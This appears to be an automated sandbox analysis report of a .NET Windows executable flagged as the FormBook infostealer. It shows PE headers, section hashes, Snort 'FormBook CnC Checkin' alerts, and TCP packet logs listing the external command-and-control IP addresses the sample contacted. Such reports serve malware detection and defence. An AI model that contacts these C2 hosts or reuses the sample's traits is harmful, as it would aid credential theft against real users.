                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xd4ad40x57.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xd60000x54c.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xd36000x3608
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xd80000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000xd2b340xd2c006548e693a19a827b95b04bc342529d94False0.8483339357206405data7.729262994799031IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0xd60000x54c0x600bcd9d69e68ed39b0c49cb550cc20ab77False0.4192708333333333data4.564993780646928IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0xd80000xc0x200c935d72cc54b86ab8abc93a5b89b1f53False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_VERSION0xd60a00x2f8data0.45921052631578946
                                                      RT_MANIFEST0xd63980x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators0.5642201834862385

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      07/09/24-12:11:31.166546TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976780192.168.2.994.130.217.114
                                                      07/09/24-12:09:32.817975TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973380192.168.2.9188.114.97.3
                                                      07/09/24-12:08:47.740793TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972080192.168.2.9188.114.96.3
                                                      07/09/24-12:10:48.702397TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975580192.168.2.9142.250.185.147
                                                      07/09/24-12:11:16.679042TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976380192.168.2.938.145.202.186
                                                      07/09/24-12:09:47.673365TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973780192.168.2.9188.114.96.3
                                                      07/09/24-12:10:21.548355TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974780192.168.2.9162.254.38.56
                                                      07/09/24-12:10:40.838976TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975280192.168.2.9142.250.185.147
                                                      07/09/24-12:08:35.398619TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971780192.168.2.9103.42.108.46
                                                      07/09/24-12:10:07.968762TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974380192.168.2.9154.12.34.252
                                                      07/09/24-12:10:13.803996TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974480192.168.2.9162.254.38.56
                                                      07/09/24-12:10:27.367616TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974880192.168.2.95.252.229.221
                                                      07/09/24-12:08:55.539602TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972380192.168.2.9188.114.96.3
                                                      07/09/24-12:11:23.430709TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976480192.168.2.994.130.217.114
                                                      07/09/24-12:10:00.222302TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974080192.168.2.9154.12.34.252
                                                      07/09/24-12:11:11.535008TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976180192.168.2.938.145.202.186
                                                      07/09/24-12:10:35.094051TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975180192.168.2.95.252.229.221
                                                      07/09/24-12:11:45.068161TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977180192.168.2.984.32.84.32
                                                      07/09/24-12:08:50.338513TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972180192.168.2.9188.114.96.3
                                                      07/09/24-12:10:16.382255TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974580192.168.2.9162.254.38.56
                                                      07/09/24-12:08:40.543474TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971980192.168.2.9103.42.108.46
                                                      07/09/24-12:09:24.363900TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973180192.168.2.935.212.86.52
                                                      07/09/24-12:10:43.430684TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975380192.168.2.9142.250.185.147
                                                      07/09/24-12:09:05.318239TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972580192.168.2.9134.122.138.60
                                                      07/09/24-12:09:30.239032TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973280192.168.2.9188.114.97.3
                                                      07/09/24-12:09:16.606161TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972880192.168.2.935.212.86.52
                                                      07/09/24-12:09:38.004077TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973580192.168.2.9188.114.97.3
                                                      07/09/24-12:10:02.804055TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974180192.168.2.9154.12.34.252
                                                      07/09/24-12:10:54.515112TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975680192.168.2.9185.181.104.242
                                                      07/09/24-12:11:37.104571TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976880192.168.2.984.32.84.32
                                                      07/09/24-12:09:19.190131TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972980192.168.2.935.212.86.52
                                                      07/09/24-12:11:02.820585TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975980192.168.2.9185.181.104.242
                                                      07/09/24-12:11:39.911847TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976980192.168.2.984.32.84.32
                                                      07/09/24-12:09:10.495852TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972780192.168.2.9134.122.138.60
                                                      07/09/24-12:11:08.956190TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976080192.168.2.938.145.202.186
                                                      07/09/24-12:11:25.996162TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976580192.168.2.994.130.217.114
                                                      07/09/24-12:09:52.842522TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973980192.168.2.9188.114.96.3
                                                      07/09/24-12:09:45.087320TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973680192.168.2.9188.114.96.3
                                                      07/09/24-12:10:29.937727TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974980192.168.2.95.252.229.221
                                                      07/09/24-12:10:57.095264TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975780192.168.2.9185.181.104.242
                                                      07/09/24-12:08:11.644897TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971580192.168.2.9142.250.185.211
                                                      07/09/24-12:08:32.822233TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971680192.168.2.9103.42.108.46
                                                      07/09/24-12:09:02.725888TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972480192.168.2.9134.122.138.60

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jul 9, 2024 12:08:11.618149042 CEST4971580192.168.2.9142.250.185.211
                                                      Jul 9, 2024 12:08:11.623234034 CEST8049715142.250.185.211192.168.2.9
                                                      Jul 9, 2024 12:08:11.623306036 CEST4971580192.168.2.9142.250.185.211
                                                      Jul 9, 2024 12:08:11.644896984 CEST4971580192.168.2.9142.250.185.211
                                                      Jul 9, 2024 12:08:11.649848938 CEST8049715142.250.185.211192.168.2.9
                                                      Jul 9, 2024 12:08:12.352881908 CEST8049715142.250.185.211192.168.2.9
                                                      Jul 9, 2024 12:08:12.352966070 CEST8049715142.250.185.211192.168.2.9
                                                      Jul 9, 2024 12:08:12.353018045 CEST4971580192.168.2.9142.250.185.211
                                                      Jul 9, 2024 12:08:12.363514900 CEST4971580192.168.2.9142.250.185.211
                                                      Jul 9, 2024 12:08:12.368686914 CEST8049715142.250.185.211192.168.2.9
                                                      Jul 9, 2024 12:08:32.792679071 CEST4971680192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:32.797666073 CEST8049716103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:32.797813892 CEST4971680192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:32.822232962 CEST4971680192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:32.827270031 CEST8049716103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:33.693687916 CEST8049716103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:33.693970919 CEST8049716103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:33.694196939 CEST4971680192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:34.325237036 CEST4971680192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:35.363758087 CEST4971780192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:35.369292021 CEST8049717103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:35.369448900 CEST4971780192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:35.398618937 CEST4971780192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:35.405355930 CEST8049717103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:36.267995119 CEST8049717103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:36.268017054 CEST8049717103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:36.268219948 CEST4971780192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:36.906497002 CEST4971780192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:37.940391064 CEST4971880192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:37.945522070 CEST8049718103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:37.945630074 CEST4971880192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:37.977267981 CEST4971880192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:37.982181072 CEST8049718103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:37.982296944 CEST8049718103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:38.824285984 CEST8049718103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:38.824337006 CEST8049718103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:38.824490070 CEST4971880192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:39.483403921 CEST4971880192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:40.518070936 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:40.523190022 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:40.523293018 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:40.543473959 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:40.548510075 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.443200111 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.443227053 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.443243027 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.443346024 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.443361998 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.443377972 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.443394899 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.443579912 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.443645954 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.443748951 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.443764925 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.443783045 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.443825006 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.443875074 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.448679924 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.448813915 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.448843956 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.448926926 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.661278963 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.661304951 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.661320925 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.661336899 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.661381960 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.661397934 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.661576986 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.661586046 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.661603928 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.661668062 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.662065983 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.662142992 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.662158012 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.662203074 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.662353039 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.662368059 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.662408113 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.662959099 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.663019896 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.663045883 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.663062096 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.663116932 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.663259983 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.663275003 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.663392067 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.663919926 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.664001942 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.664016962 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.664062977 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.664231062 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.664246082 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.664288998 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.666430950 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.666500092 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.751796007 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.751821995 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.751966000 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.879272938 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.879328012 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.879344940 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.879374981 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.879425049 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.879492044 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.879513979 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.879627943 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.879643917 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.879659891 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.879666090 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.879692078 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.879935980 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880062103 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880078077 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880094051 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880100012 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.880110025 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880125046 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880126953 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.880157948 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.880506039 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880553961 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880589962 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.880673885 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880688906 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880706072 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.880723000 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.881455898 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881514072 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.881548882 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881563902 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881580114 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881596088 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881599903 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.881612062 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881628036 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881629944 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.881645918 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881664038 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.881829977 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881846905 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881863117 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.881866932 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.881901026 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.882165909 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882181883 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882196903 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882211924 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882215023 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.882245064 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.882627010 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882642031 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882658005 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882673025 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882678032 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.882689953 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882704973 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.882715940 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.882740021 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.883296967 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.883311987 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.883327007 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.883343935 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.883357048 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.883359909 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.883375883 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.883382082 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.883393049 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.883409977 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.884011984 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.884030104 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.884053946 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.884179115 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:41.884301901 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:41.969871998 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.011029005 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.097639084 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.097696066 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.097754955 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.097789049 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.097824097 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.097858906 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.097870111 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.097894907 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.097932100 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098190069 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098203897 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.098223925 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098259926 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098339081 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.098498106 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098532915 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098566055 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.098568916 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098653078 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.098807096 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098861933 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098896027 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098929882 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098938942 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.098963976 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.098987103 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.098998070 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.099033117 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.099067926 CEST8049719103.42.108.46192.168.2.9
                                                      Jul 9, 2024 12:08:42.099071980 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.099194050 CEST4971980192.168.2.9103.42.108.46
                                                      Jul 9, 2024 12:08:42.099713087 CEST8049719103.42.108.46192.168.2.9
